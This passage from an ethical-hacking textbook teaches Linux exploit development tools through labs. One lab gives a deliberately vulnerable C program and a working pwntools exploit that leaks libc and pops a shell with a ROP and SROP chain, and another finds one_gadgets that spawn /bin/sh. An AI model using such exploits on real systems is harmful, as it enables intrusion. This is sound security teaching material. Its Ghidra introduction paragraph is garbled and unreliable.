s.send(b'Say something: ')➋ # b tag added in python3 to indicate bytes not str
data = s.recv(1024)➌
s.close()➍
print('Received', data)➎

   You do need to remember to import the socket library. The socket instantiation
line also has some socket options to remember, but the rest is easy. You connect to a
host and port ➊, send what you want ➋, then use recv to store the data into an object
➌, and then close the socket ➍. When you execute this in a separate shell, by typing
python3 client.py, you should see “Say something:” show up on your netcat listener.
Anything you type into the listener should be returned to the client ➎. For extra credit,
figure out how to simulate that netcat listener in Python with the bind(), listen(), and
accept() statements.

Summary
This chapter provides you with introductory programming concepts and security consid-
erations. An ethical hacker must have programming skills to create exploits and review
source code, and they need to understand assembly code when reversing malware or find-
ing vulnerabilities. Last but not least, debugging is a must-have skill in order to analyze
the malware at runtime or to follow the execution of shellcode in memory. The only way
to learn a programming language or reverse engineering is through practice, so get working!

For Further Reading
Style Guide for Python www.python.org/dev/peps/pep-0008/
Example of C Program without Main stackoverflow.com/questions/42328165/
compile-and-run-program-without-main-in-c
Using GNU C Compiler (gcc) gcc.gnu.org/onlinedocs/gcc-3.2/gcc/Invoking-GCC
.html
Gray Hat Hacking: The Ethical Hacker’s Handbook
              Kali and Python 3 www.kali.org/docs/general-use/python3-transition/
              Upgrading to python 3 on mac (correct way) opensource.com/article/19/5/python-
              3-default-mac
              “A CPU History,” PC Mech, March 23, 2001 (Nik) www.pcmech.com/article/a-
              cpu-history
              Art of Assembly Language Programming and HLA (Randall Hyde) www
              .randallhyde.com
              ddd debugger frontend www.gnu.org/software/ddd/
              Debugging with NASM and gdb www.csee.umbc.edu/help/nasm/nasm.shtml
              edb debugger github.com/eteran/edb-debugger
              “Endianness,” Wikipedia en.wikipedia.org/wiki/Endianness
              Good Python tutorial docs.python.org/3/tutorial/
              “How C Programming Works,” How Stuff Works (Marshall Brain) computer
              .howstuffworks.com/c.htm
              “Byte and Bit Order Dissection,” Linux Journal, September 2, 2003 (Kevin
              Kaichuan He) www.linuxjournal.com/article/6788
              Notes on x86 assembly, 1997 (Phil Bowman) www.ccntech.com/code/x86asm.txt
              64 bit tutorial, Sonictk sonictk.github.io/asm_tutorial/
              “Programming Methodology in C” (Hugh Anderson) www.comp.nus.edu
              .sg/~hugh/TeachingStuff/cs1101c.pdf
              Python home page www.python.org
              Python Tutor www.pythontutor.com
              “Smashing the Stack for Fun and Profit” (Aleph One) www.phrack.org/issues
              .html?issue=49&id=14#article
              x86 registers www.eecg.toronto.edu/~amza/www.mindsec.com/files/x86regs.html
              x64 architecture docs.microsoft.com/en-us/windows-hardware/drivers/debugger/
              x64-architecture

              References
                   1. Danny Cohen, “On Holy Wars and a Plea for Peace.” Internet Experiment Note
                      (IEN) 137, April 1, 1980, www.ietf.org/rfc/ien/ien137.txt.
                   2. Guido Van Rossum, “[Python-Dev] Replacement for Print in Python 3.0,”
                      September 4, 2006, mail.python.org, https://mail.python.org/pipermail/
                      python-dev/2005-September/056154.html.
  Linux Exploit
  Development Tools
                                                                            CHAPTER

                                                                                             3
  In this chapter, we cover the following topics:
      • Binary, dynamic information-gathering tools: ldd, objdump, strace, ltrace,
        checksec, libc-database, patchelf, one_gadget, and Ropper
      • Extending gdb with Python and the popular gdb scripts Gef and pwndbg
      • The pwntools capture the flag (CTF) and exploit development library
      • The HeapME (Heap Made Easy) heap analysis and collaboration tool

With the evolution of Linux security controls, and techniques to bypass these limita-
tions, the fields of vulnerability discovery, crash analysis, and exploit development are
becoming more challenging. This forces researchers to spend more time and effort on
finding and exploiting critical vulnerabilities.
   In this chapter, we review various modern exploit development tools that can help
simplify the process of information gathering, crash analysis, debugging, and exploit
development.

Binary, Dynamic Information-Gathering Tools
Some of these tools might be familiar to you because they are useful in more than just the
exploit development field. We will begin with the more popular (and old-school) ones,
but when showing newer tools, in some cases we will also demonstrate how you can find
the same information “manually.”

Lab 3-1: Hello.c

Let’s begin by connecting to a standard Kali machine. Open your favorite text editor to
write the following simple program, which will be used as a lab for testing and under-
standing the different tools:
// hello.c
#include <stdio.h>
#include <stdlib.h>

Gray Hat Hacking: The Ethical Hacker’s Handbook
              #include <string.h>
              int main() {
                    char *ghh = malloc(30);
                    strncpy(ghh, "Gray Hat Hacking", 16);
                    printf("%s - ", ghh);
                    free(ghh);
                    puts("6th Edition");
                    return 0;
              }

                 This file is also provided to you in your ~/GHHv6/ch03 folder, having previously
              cloned the Gray Hat Hacking 6th Edition Git repository. Now let’s compile and execute
              the binary to confirm it works as expected:
              ┌──(kali kali)-[~/GHHv6/ch03]
              └─$ gcc hello.c -o hello && ./hello
              Gray Hat Hacking - 6th Edition

              Lab 3-2: ldd

              The ldd tool displays the shared libraries loaded by programs at runtime. These librar-
              ies have the suffix .so (shared object) and consist of individual files that contain a list of
              functions. Using shared libraries has many benefits, such as promoting code reusability,
              writing smaller programs, and making large applications easier to maintain.
                 From a security perspective, it is important to understand which shared libraries a
              program is using and how they are being loaded. If the developer is not careful enough,
              shared libraries could be abused to gain code execution or full system compromise.
              Attack opportunities range from finding weak file permissions and using rpath to replace
              a shared library with an evil one, to being able to leak an address of a loaded library, and
              even abusing its interesting gadgets to achieve execution flow control with ROP/JOP
              code-reuse attack techniques.
                 Here is the output after running ldd /bin/ls:
              ┌──(kali kali)-[~/GHHv6/ch03]
              └─$ ldd /bin/ls
                 linux-vdso.so.1 (0x00007ffcee78f000)
                 libselinux.so.1 => /lib/x86_64-linux-gnu/libselinux.so.1 (0x00007f122caa2000)
                 libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f122c8dd000)
                 libpcre2-8.so.0 => /lib/x86_64-linux-gnu/libpcre2-8.so.0 (0x00007f122c845000)
                 libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007f122c83f000)
                 /lib64/ld-linux-x86-64.so.2 (0x00007f122cb0b000)
                 libpthread.so.0 => /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007f122c81d000)

              Lab 3-3: objdump

              We can use objdump as a command-line disassembler and also to get important
              information about executable files and objects. Let’s get some information about the
              hello binary.
Getting the Global Offset Table (GOT) and Procedure Linkage Table (PLT)
When analyzing a stripped binary, you can use objdump to reverse the memory address

                                                                                                                   PART I
of the function of interest.

             NOTE Chapter 11 provides more information on Global Offset Tables (GOTs)
             and Procedure Linkage Tables (PLTs).

  With the -R option, you can display the list of functions in the GOT:
┌──(kali kali)-[~/GHHv6/ch03]
└─$ objdump -R ./hello
./hello:     file format elf64-x86-64
...
0000000000004020 R_X86_64_JUMP_SLOT puts@GLIBC_2.2.5
0000000000004028 R_X86_64_JUMP_SLOT printf@GLIBC_2.2.5
0000000000004030 R_X86_64_JUMP_SLOT malloc@GLIBC_2.2.5

   Now let’s use objdump to locate the address that will be called in the PLT to get to
the puts() function:
┌──(kali kali)-[~/GHHv6/ch03]
└─$ objdump -M intel -d -j .plt ./hello | grep 4020
 1040:   ff 25 da 2f 00 00 jmp QWORD PTR [rip+0x2fda]             # 4020 puts@
GLIBC_2.2.5

  Here are some points to note:

   • -M intel tells objdump to use Intel syntax mode instead of the default (AT&T).
   • -d is short for --disassemble.
   • -j .plt specifies the section we want to display (PLT).
Now we will use -j .text to find the call to puts in the program we are analyzing:
┌──(kali kali)-[~/GHHv6/ch03]
└─$ objdump -M intel -d -j .text ./hello| grep 1040
    11c5:   e8 76 fe ff ff          call   1040 <puts@plt>

Finding References to Constant Strings
In certain situations you might need to find references to strings in stripped binaries to
help speed up the debugging process, or to find magical gadgets in an object (you will
learn how to find one_gadgets manually in Lab 3-9, later in this chapter).
   We can find references to strings in two steps. The first step is
┌──(kali kali)-[~/GHHv6/ch03]
└─$ strings -tx hello|grep "6th"
   200a 6th Edition

where -tx (-t is for radix, x is for hexadecimal) prints the offset within the file at the
beginning of each string.
Gray Hat Hacking: The Ethical Hacker’s Handbook
                  The second step is
              ┌──(kali kali)-[~]
              └─$ objdump -M intel -d ./hello|grep -C1 200a
                 11b9: e8 72 fe ff ff        call 1030 <free@plt>
                 11be: 48 8d 3d 45 0e 00 00 lea    rdi,[rip+0xe45] # 200a <_IO_stdin_used+0xa>
                 11c5: e8 76 fe ff ff        call 1040 <puts@plt>

              Lab 3-4: strace

              The strace command-line utility is useful when we need to trace system calls and signals.
              It uses the ptrace system call to inspect and manipulate the target program, and besides
              allowing us to better understand the program’s behavior, it can also be used for tampering
              with the behavior of system calls for better troubleshooting or for faster reproduction of
              an attack under specific situations (for example, fault injection, return value injection,
              signal injection, and delay injection). Let’s look at some examples.
                 First of all, make sure you have the strace package installed using the dpkg -l strace
              command because it doesn’t ship with Kali by default. Use sudo apt install strace to install it.
                 When you run strace without arguments, it will display all system calls and signals,
              like so:
              ┌──(kali kali)-[~/GHHv6/ch03]
              └─$ strace ./hello
              execve("./hello", ["./hello"], 0x7ffc5f37c750 /* 30 vars */) = 0
              brk(NULL)                               = 0x56455a042000
              ...
              write(1, "Gray Hat Hacking - 6th Edition\n", 31Gray Hat Hacking - 6th Edition
              ) = 31
              exit_group(0)                           = ?
              +++ exited with 0 +++

                 We can use -e trace=syscall if we want to trace/filter a particular system call, as
              shown next:
              ┌──(kali kali)-[~/GHHv6/ch03]
              └─$ strace -e trace=write ./hello
              write(1, "Gray Hat Hacking - 6th Edition\n", 31Gray Hat Hacking - 6th Edition
              ) = 31
              +++ exited with 0 +++

                  How would the program behave if the write function is not implemented?
              ┌──(kali kali)-[~/GHHv6/ch03]
              └─$ strace -e trace=write -e fault=write ./hello
              write(1, "Gray Hat Hacking - 6th Edition\n", 31) = -1 ENOSYS (Function not
              implemented) (INJECTED)
              +++ exited with 0 +++
  We can also inject a specific error response. Let’s inject the error “EAGAIN (Resource
temporarily unavailable)” instead:

                                                                                                                    PART I
┌──(kali kali)-[~/GHHv6/ch03]
└─$ strace -e trace=write -e fault=write:error=EAGAIN ./hello
write(1, "Gray Hat Hacking - 6th Edition\n", 31) = -1 EAGAIN (Resource
temporarily unavailable) (INJECTED)
+++ exited with 0 +++

   It is also possible to use strace to inject delays. This is very helpful in many cases,
but a good example is a situation where we need to make a race condition more deter-
ministic by helping decrease the randomness of the scheduler preemption. Let’s inject a
delay of 1 second before the read function executes (delay_enter) and a delay 1 second
after the write function executes (delay_exit). By default, the expected time precision
is microseconds:
┌──(kali kali)-[~/GHHv6/ch03]
└─$ strace -e inject=read:delay_enter=1000000 \
-e inject=write:delay_exit=1000000 ./hello
...

  If you’re interested in learning more about strace, Dmitry Levin (the active strace
maintainer) walks you through a list of powerful features in his “Modern strace” talk.1

Lab 3-5: ltrace

The main purpose of the ltrace utility is to trace calls to shared libraries and their
responses, but it can also be used to trace system calls. Make sure you have the ltrace
package installed using the dpkg -l ltrace command, as it isn’t shipped with Kali by
default. Use sudo apt install ltrace in case you need to install it.
   Here is the output after running ltrace ./hello:
┌──(kali kali)-[~/GHHv6/ch03]
└─$ ltrace ./hello
malloc(30) = 0x55fc9cf772a0
printf("%s - ", "Gray Hat Hacking")= 19
free(0x55fc9cf772a0) = <void>
puts("6th Edition"Gray Hat Hacking - 6th Edition) = 12
+++ exited (status 0) +++

             NOTE You can use the -S option to display system calls.
Gray Hat Hacking: The Ethical Hacker’s Handbook

              Lab 3-6: checksec

              The checksec shell script parses a program’s ELF header to determine which compile-time
              mitigation technologies are being used, such as RELRO, NX, Stack Canaries, ASLR, and
              PIE. This helps to identify constraints for exploitation. Similar checksec functions and
              commands are also available on most exploitation development tools and frameworks
              (such as the pwntools checksec function).

                                 NOTE Chapter 11 provides more information on compile-time mitigation
                                 technologies.

                 We could get checksec directly from its GitHub page,2 or install it using sudo apt
              install checksec.
                 Running checksec on the hello program we compiled earlier will show the enabled
              mitigations (depending on the defaults for the distribution’s gcc configuration), as
              shown here:
              ┌──(kali kali)-[~/GHHv6/ch03]
              └─$ checksec --file=./hello
              [*] '/home/kali/GHHv6/ch03/hello'
                  Arch:     amd64-64-little
                  RELRO:    Partial RELRO
                  Stack:    No canary found
                  NX:       NX enabled
                  PIE:      PIE enabled

                 Let’s compile our hello.c program again with all the security mitigations enabled and
              then run checksec:
              ┌──(kali kali)-[~/GHHv6/ch03]
              └─$ gcc hello.c -Wl,-z,relro,-z,now -O2 -D_FORTIFY_SOURCE=2 -s \
              -fstack-protector-all -o hello-stronger
              └─$ checksec --file=./hello-stronger
              [*] '/home/kali/GHHv6/ch03/hello-stronger'
                  Arch:     amd64-64-little
                  RELRO:    Full RELRO
                  Stack:    Canary found
                  NX:       NX enabled
                  PIE:      PIE enabled
                  FORTIFY: Enabled

Lab 3-7: libc-database

                                                                                                                    PART I
Sometimes you manage to find and exploit an information leak vulnerability, but it is
impossible to calculate the offset to the libc base or other functions unless you know the
libc version being used on the remote host. The libc-database downloads a list of config-
ured libc versions, extracts the symbol offsets, and allows you to query the function name
and leaked address in order to identify the libc version being used.

   1. Let’s clone the libc-database GitHub repository:3
      ┌──(kali kali)-[~]
      └─$ git clone https://github.com/niklasb/libc-database.git
      ...
   2. It is possible to download all pre-provisioned libc versions within the get script,
      but you can also download distro-specific versions for Ubuntu, Debian, RPM,
      CentOS, Arch, Alpine, Kali, and Parrot OS. Let’s download the libc versions used
      by Kali Linux. Inside the /home/kali/libc-database folder, execute the following:
      ┌──(kali kali)-[~/libc-database]
      └─$ ./get kali
      ...
   3. Find all the libc versions in the database that have the given names at the given
      addresses. Let’s use readelf to get the puts offset and then use the libc-database
      find script:
      ┌──(kali kali)-[~/libc-database]
      └─$ readelf -s /lib/x86_64-linux-gnu/libc.so.6|grep puts
         430: 00000000000765f0   472 FUNC   WEAK   DEFAULT   14 puts@@
      GLIBC_2.2.5
      ...
      ┌──(kali kali)-[~/libc-database]
      └─$ ./find puts 765f0
      kali-glibc (libc6_2.31-9_amd64)
      kali-glibc (libc6-amd64_2.31-9_i386)

  In cases where you don’t have your local database available, there is also a hosted web
wrapper4 at https://libc.blukat.me that allows you to query the libc-database without
having to install/configure it locally (see Figure 3-1).

Figure 3-1 The libc-database web wrapper at https://libc.blukat.me
Gray Hat Hacking: The Ethical Hacker’s Handbook

              Lab 3-8: patchelf

              The patchelf command-line utility allows us to modify the libraries of an ELF execut-
              able. It is very useful when we are doing heap analysis on a different libc version than the
              one being used by the remote system, or when we don’t have access to the source code
              and want to run multiple libc versions on the same system. You could get patchelf from
              its GitHub repo5 or simply install it using sudo apt install patchelf.
                  In this lab we’ll patch the hello binary to use an interpreter and libc version copied to
              the /home/kali/GHHv6/ch03/lib directory:

                   1. We first create the lib folder and copy the system’s ld-linux.so and libc:
                       ┌──(kali kali)-[~]
                       └─$ cd /home/kali/GHHv6/ch03 &&
                       mkdir lib &&
                       cp /lib64/ld-linux-x86-64.so.2 lib/my-ld.so &&
                       cp /lib/x86_64-linux-gnu/libc-2.31.so lib &&
                       ln -s libc-2.31.so lib/libc.so.6
                   2. Now we can patch the hello binary and confirm that the changes were made
                      successfully and that our program runs:

                       ┌──(kali kali)-[~/GHHv6/ch03]
                       └─$ patchelf --set-interpreter ./lib/my-ld.so --set-rpath ./lib hello
                       ┌──(kali kali)-[~/GHHv6/ch03]
                       └─$ ldd hello
                           linux-vdso.so.1 (0x00007ffc685d0000)
                           libc.so.6 => ./lib/libc.so.6 (0x00007f4b18146000)
                           ./lib/my-ld.so => /lib64/ld-linux-x86-64.so.2 (0x00007f4b18313000)
                       ┌──(kali kali)-[~/GHHv6/ch03]
                       └─$ ./hello
                       Gray Hat Hacking - 6th Edition

              Lab 3-9: one_gadget

              One_gadgets are found in libc and provide a simple way of getting a shell by jumping to
              a single gadget to execute execve("/bin/sh", NULL, NULL).
                 We can find these magical gadgets in one of two ways: by manually using strings and
              objdump or by using the one_gadget tool.

              Manually Using Strings and objdump
              First, let’s use strings to get the offset address of /bin/sh in the target libc library:
              ┌──(kali kali)-[~/GHHv6/ch03]
              └─$ strings -tx /lib/x86_64-linux-gnu/libc.so.6|grep /bin/sh
               18a156 /bin/sh
  Then we can use objdump to look for references to the /bin/sh string address:

                                                                                                                  PART I
┌──(kali kali)-[~/GHHv6/ch03]
└─$ objdump -M intel -d /lib/x86_64-linux-gnu/libc.so.6 |grep -C8 18a156
...
   cbd1a:       4c 89 ea               mov    rdx,r13
   cbd1d:       4c 89 e6               mov    rsi,r12
   cbd20:       48 8d 3d 2f e4 0b 00   lea    rdi,[rip+0xbe42f] # 18a156 <...
   cbd27:       e8 94 f9 ff ff         call   cb6c0 <execve@@GLIBC_2.2.5>
...

  The only constraint here is that, at the moment of execution, r12 and r13 must be
equal to NULL. This way, the rdi, rsi, and rdx registers will contain the values /bin/sh,
NULL, NULL, respectively.

Using the one_gadget Tool
Instead of going through the task of finding one_gadgets manually for multiple glibc
versions, you can use the one_gadget tool, written in Ruby by david942j, and available
on RubyGems (gem install one_gadget). This tool uses symbolic execution to find the
one_gadgets and their constraints.
   This project is available on GitHub.6 In order to install it, use the command sudo
gem install one_gadget.
   In order to find one_gadgets automagically, we execute the tool, specifying the target
library, like so:
┌──(kali kali)-[~/GHHv6/ch03]
└─$ one_gadget /lib/x86_64-linux-gnu/libc.so.6
0xcbd1a execve("/bin/sh", r12, r13)
constraints:
  [r12] == NULL || r12 == NULL
  [r13] == NULL || r13 == NULL
0xcbd1d execve("/bin/sh", r12, rdx)
constraints:
  [r12] == NULL || r12 == NULL
  [rdx] == NULL || rdx == NULL
0xcbd20 execve("/bin/sh", rsi, rdx)
constraints:
  [rsi] == NULL || rsi == NULL
  [rdx] == NULL || rdx == NULL

Lab 3-10: Ropper

Ropper is a useful tool for generating ROP chains and finding code reuse gadgets. It
is capable of loading ELF, PE, and Mach-O binary file formats, and it supports mul-
tiple architectures (x86, x86_64, MIPS, MIPS64, ARM/Thumb, ARM64, PowerPC,
and Sparc) using the Capstone7 disassembly framework. To install Ropper, use sudo apt
install ropper.
Gray Hat Hacking: The Ethical Hacker’s Handbook
                 One of its most interesting features is the ability to search for gadgets based on con-
              straints and file format conditions. Let’s create a ROP chain that calls mprotect() to
              enable executable permission on an arbitrary address:
              ┌──(kali kali)-[~/GHHv6/ch03]
              └─$ ropper --file hello --chain 'mprotect address=0xdeadbabe size=0x1000'

                  The resulting piece of Python code will be produced:
              rop = ""
              # Filled registers: rdi, rsi,
              rop += rebase_0(0x000000000000123b) # 0x000000000000123b: pop rdi; ret;
              rop += p(0x00000000deadbabe)
              rop += rebase_0(0x0000000000001239) # 0x0000000000001239: pop rsi; pop r15; ret;
              rop += p(0x0000000000001000)
              rop += p(0xdeadbeefdeadbeef)

                 We can also use semantic search to find a gadget that increases the stack pointer
              16 bytes, avoiding clobbering the R15 and RDI registers: ropper --file <binary-file>
              --semantic ‘rsp+=16 !r15 !rdi’. In order to use this feature, you must install pyvex and
              z3 following the instructions on the project’s GitHub page.8
                 As you can see, this saves a lot of time and effort, and it brings many other interesting
              features—from jump-oriented programming (JOP) to stack pivoting. For more informa-
              tion about Ropper and its functionalities, visit the project’s GitHub page.

              Extending gdb with Python
              Support for extending gdb with Python was added in version 7. This feature is only avail-
              able if gdb was compiled with the configuration option --with-python.
                 Thanks to this feature, besides being able to write custom functions and automate
              many tasks, multiple gdb plug-in projects have been actively developed in order to sim-
              plify and enrich the debugging process, with features like embedded hexdump view,
              dereferencing data or registers, heap analysis, automatic detection of Use-After-Free
              (UAF), among other powerful features. Here are some of the most popular gdb scripts:

                   1. Gef 9GDB enhanced features for exploit developers and reverse engineers
                   2. Pwndbg10 Exploit development and reverse engineering with GDB Made Easy
                   3. PEDA11 Python Exploit Development Assistance for GDB

              Pwntools CTF Framework and Exploit
              Development Library
              Pwntools is a capture the flag (CTF) and exploit development library that’s excellent for
              the rapid prototyping of exploits. It saves you significant time and effort when writing
              common exploitation tasks, letting you focus on the logics of your exploit, as well as
              provides a vast set of useful features.
  Execute the following commands to install pwntools:

                                                                                                                 PART I
┌──(kali kali)-[~]
└─$ sudo apt-get update
└─$ sudo apt-get install python3 python3-pip python3-dev git libssl-dev \
libffi-dev build-essential
└─$ sudo python3 -m pip install --upgrade pip
└─$ sudo python3 -m pip install --upgrade pwntools

Summary of Features
Let’s open our Python terminal, import the pwn module and explore some of the power-
ful features of Pwntools:
┌──(kali kali)-[~/GHHv6/ch03]
└─$ python3
>>> from pwn import *
#Packing and Unpacking strings
>>> p8(0)
b'\x00'
>>> p32(0xdeadbeef)
b'\xef\xbe\xad\xde'
>>> p64(0xdeadbeefdeadbeef, endian='big')
b'\xde\xad\xbe\xef\xde\xad\xbe\xef'
>>> hex(u64('\xef\xbe\xad\xde\xef\xbe\xad\xde'))
'0xdeadbeefdeadbeef'
#Assemble and Disassemble code
>>> asm('nop')
b'\x90'
>>> print(disasm(b'\x8b\x45\xfc'))
   0:    8b 45 fc               mov    eax, DWORD PTR [ebp-0x4]
#ELF symbol resolver
>>> ELF("/lib/x86_64-linux-gnu/libc.so.6")
[*] '/lib/x86_64-linux-gnu/libc.so.6'
    Arch:      amd64-64-little
    RELRO:     Partial RELRO
    Stack:     Canary found
    NX:        NX enabled
    PIE:       PIE enabled

   Other features include functions to assist with common exploitation primitives and
techniques, such as building ROP chains, shellcodes and SROP structures, dynamic
memory leak helpers, format string exploitation, cyclic pattern generation, and more.
   In Lab 3-11, we develop a two-stage exploit that bypasses ASLR, PIE, and NX using
a ROP + SROP payload.

Lab 3-11: leak-bof.c

First, we compile some code that’s vulnerable to buffer overflow:
// leak-bof.c
#include <stdio.h>
#include <unistd.h>
Gray Hat Hacking: The Ethical Hacker’s Handbook
              void vuln() {
                  char buff[128];
                  printf("Overflows with 128 bytes: ");
                  fflush(stdout);
                  read(0, buff, 0x2000);
              }
              int main(int argc, char **argv) {
                  printf("I'm leaking printf: %p\n", (long)printf);
                  vuln();
              }

                  Next, we run this exploit written in Python with pwntools:
              #!/usr/bin/env python3

              from pwn import *
              context.update(arch='amd64', os='linux')

              libc = ELF("/usr/lib/x86_64-linux-gnu/libc-2.31.so")
              p = process("./leak-bof")

              l = log.progress("Stage 1: leak printf and calculate libc's base address")
              p.readuntil("I'm leaking printf: ")
              libc.address = int(p.readline(), 16) - libc.sym['printf']
              l.success(f"0x{libc.address:x}")

              rop = ROP(libc)
              l = log.progress("Stage 2: pop a shell with ROP + SROP payload")
              rop.raw(rop.find_gadget(['pop rax', 'ret']).address)
              rop.raw(constants.SYS_rt_sigreturn)
              rop.raw(rop.syscall.address)

              # build SROP frame
              frame = SigreturnFrame(kernel="amd64", arch="amd64")
              frame.rax = constants.SYS_execve
              frame.rdi = next(libc.search(b"/bin/sh"))
              frame.rsi = 0
              frame.rdx = 0
              frame.rip = rop.syscall.address

              # send stack smash and payload
              p.sendlineafter(": ", b"A"*136 + rop.chain() + bytes(frame))
              l.success('Enjoy!')
              p.interactive()

                A smaller and simpler exploit could be used here, but we’ll purposely use a slightly
              more complicated exploit in order to showcase the possibilities. This is the result:
              ┌──(kali kali)-[~/GHHv6/ch03]
              └─$ python3 leak-bof-exploit.py
              [*] '/usr/lib/x86_64-linux-gnu/libc-2.31.so'
                  Arch:     amd64-64-little
                  RELRO:    Partial RELRO
                  Stack:    Canary found
                  NX:       NX enabled
                  PIE:      PIE enabled
[+] Starting local process './leak-bof': pid 3900
[+] Stage 1: leak printf and calculate libc's base address: 0x7f120d489000
[*] Loading gadgets for '/usr/lib/x86_64-linux-gnu/libc-2.31.so'

                                                                                                                   PART I
[+] Stage 2: pop a shell with ROP + SROP payload: Enjoy!
[*] Switching to interactive mode
$ id
uid=1000(kali) gid=1000(kali) groups=1000(kali),24(cdrom),25(floppy),27(sudo)...

HeapME (Heap Made Easy)
Heap Analysis and Collaboration Tool
Heap Made Easy (HeapME)12 is an open source tool developed by Huáscar Tejeda (the
author of this chapter) to help simplify the process of heap analysis and collaboration.
Here’s a list of some of HeapME’s features:

   • Timeless heap debugging
   • Tracking of all chunks/free bins states
   • Seamless analysis collaboration
   • Shared link for read-only visualization
   • Great for CTFs
   • Support for ptmalloc2 in current version
  Navigate to https://heapme.f2tc.com/5ebd655bdadff500194aab4f (POC of the
House of Einherjar2) to see the HeapME web-based visualization.

Installing HeapME
Before seeing HeapME in action, let’s begin by installing and configuring gdb and the
modified Gef fork13 with the HeapME plug-in. If gdb isn’t installed (dpkg -l gdb), install
it using sudo apt install gdb.
┌──(kali kali)-[~]
└─$ git clone https://github.com/htejeda/gef.git &&
pip install -r gef/requirements.txt &&
echo "source ~/gef/gef.py\nsource ~/gef/scripts/heapme.py" > ~/.gdbinit
┌──(kali kali)-[~]
└─$ gdb
GNU gdb (Debian 10.1-1.7) 10.1.90.20210103-git
...
gef➤ help heapme
Heap Made Easy
...
heapme init -- Connect to the HeapMe URL and begins tracking dynamic
               heap allocation
heapme push -- Uploads all events to the HeapME URL
heapme watch -- Updates the heap layout when this breakpoint is hit
Type "help heapme" followed by heapme subcommand name for full documentation.
gef➤
Gray Hat Hacking: The Ethical Hacker’s Handbook
                  Now follow the steps in Lab 3-12.

              Lab 3-12: heapme_demo.c

              To begin, create and compile the following program:
              //heapme_demo.c
              #include <stdio.h>
              #include <stdlib.h>
              #include <string.h>
              #include <unistd.h>

              void *x[8];

              int main() {
                  for (int i=0; i < 8; i++) {
                      x[i] = malloc(0x38);
                      memset(x[i], (i + 0x30), 0x38);
                  }

                     for (int i=0; i < 8; i++)
                         free(x[i]);

                     fprintf(stderr, "Press CTRL+C to exit.\n");
                     pause();
                     return 0;
              }
              ┌──(kali kali)-[~/GHHv6/ch03]
              └─$ gcc heapme_demo.c -o heapme_demo

                 Next, execute the following steps (which include references to the code that follows)
              to see HeapME in action:

                   1. Use gdb to debug the heapme_demo program ➊.
                   2. Execute the gdb command start ➋.
                   3. Launch Gef ’s heap-analysis-helper plug-in ➌.
                   4. Go to the HeapME website (https://heapme.f2tc.com/).
                        a. Register and log in.
                        b. Create and copy a new HeapME URL and key.
                        c. Once that’s copied, click the Next button.
                   5. Go back to gdb and paste in the line heapme init https://heapme.f2tc.com/
                      <id> <key> ➍.
                   6. We will use heapme watch malloc ➎ and heapme watch free ➏ to update all
                      heap chunk and free bins information whenever these breakpoints are hit.
   7. Execute c or continue ➐. You should see the HeapME URL being updated in
      real time (refer to Figure 3-2). This is also a good opportunity for you to play

                                                                                                                   PART I
      with Gef ’s heap commands (heap bins, heap chunks, and so on).

      ┌──(kali kali)-[~/GHHv6/ch03]
      └─$ ➊ gdb ./heapme_demo
      gef➤ ➋ start
      gef➤ ➌ heap-analysis-helper
      gef➤ ➍ heapme init https://heapme.f2tc.com/ 60281a00e8b485001a485db5
      17074900...
                   _   _                  __ __ _____
                  | | | | ___ __ _ _ __ | \/ | ____|
                  | |_| |/ _ \/ _` | '_ \| |\/| | _|
                  | _ | __/ (_| | |_) | | | | |___
                  |_| |_|\___|\__,_| .__/|_| |_|_____|
                                   |_|
      [+] HeapME: connected to https://heapme.f2tc.com/
      gef➤ ➎ heapme watch malloc
      Breakpoint 1 at 0x7ffff7e7a0f0: malloc. (2 locations)
      [+] HeapMe will update the heap chunks when the malloc breakpoint is hit
      gef➤ ➏ heapme watch free
      Breakpoint 2 at 0x7ffff7e7a720: free. (2 locations)
      [+] HeapMe will update the heap chunks when the free breakpoint is hit
      gef➤ ➐ continue
      Continuing.
      [+] Heap-Analysis - __libc_malloc(56)=0x5555555592a0
      ...
      Press CTRL+C to exit.

Figure 3-2 HeapME displaying heapme_demo’s dynamic memory interactions
Gray Hat Hacking: The Ethical Hacker’s Handbook
              Summary
              In this chapter, we presented a list of useful tools that will significantly improve your
              dynamic analysis process. We also discussed ways to extend and automate the debug-
              ging process with gdb. We looked at vulnerable proof-of-concept code with the exploit
              written in Python using the pwntools development framework. Finally, we explored the
              HeapME (Heap Made Easy) heap analysis and collaboration tool.

              For Further Reading
              ELF Specification refspecs.linuxbase.org/elf/elf.pdf
              Extending GDB Using Python sourceware.org/gdb/current/onlinedocs/gdb/Python
              .html
              Pwntools docs.pwntools.com

              References
                   1. Dmitry Levin, “Modern strace,” Open Source Summit Europe, 2018, https://
                      events19.linuxfoundation.org/wp-content/uploads/2017/12/Modern-Strace-
                      Dmitry-Levin-BaseALT.pdf
                   2. checksec, http://github.com/slimm609/checksec.sh.
                   3. libc-database GitHub, https://github.com/niklasb/libc-database.
                   4. libc-database web wrapper, https://libc.blukat.me.
                   5. patchelf, https://github.com/NixOS/patchelf.
                   6. one_gadget, https://github.com/david942j/one_gadget.
                   7. Capstone: The Ultimate Disassembler, www.capstone-engine.org.
                   8. Ropper, https://github.com/sashs/Ropper.
                   9. Gef, https://gef.readthedocs.io/en/master/.
                 10. Pwndbg, https://github.com/pwndbg/pwndbg.
                 11. PEDA, https://github.com/longld/peda.
                 12. Heap Made Easy (HeapME), https://heapme.f2tc.com/.
                 13. HeapME Gef fork, https://github.com/htejeda/gef.
  Introduction to Ghidra
                                                                           CHAPTER

                                                                                            4
  In this chapter, we cover the following topics:
      • Ghidra installation and a quick start, along with a simple project setup
      • An overview of Ghidra’s most essential functionality
      • Annotations to achieve improved reversed code’s readability and understanding
      • Practical walkthrough binary diffing and patch analysis

Gda  a Sowae Revee Eee (SRE) ue o oo deveoped ad maaed
by e Naoa Seuy Aey’ Reea Deoae  uppo o  ybeeuy
mo. Gda wa made puby avaabe ad ope oued aoud Ma o Ap
o 209 bu a bee bae-eed pvaey by e aey. I a be ued o mawae
aay, vueaby eea, expo deveopme, a we a may oe embedded
yem ad mwae evee eee ak.
   Gda uppo a vaey o aeue, paom, ad bay oma, povd
a vey ee e o eaue. Ao,  ommuy  apdy ow, a Gda a
povded a exee ope oue ad ee-o-o aeave o oe ea oo u
a IDA Po.

Creating Our First Project
I  ape, we w be omp a ampe poam uabe o owae Gda’
eaue ad uoae. T ampe poam  a ude ade maaeme oo
a oad a CSV e ad oa a vueaby o ou ad-o aay ak.
   Te ude., ude-paed., ad ude.v e ae povded o you
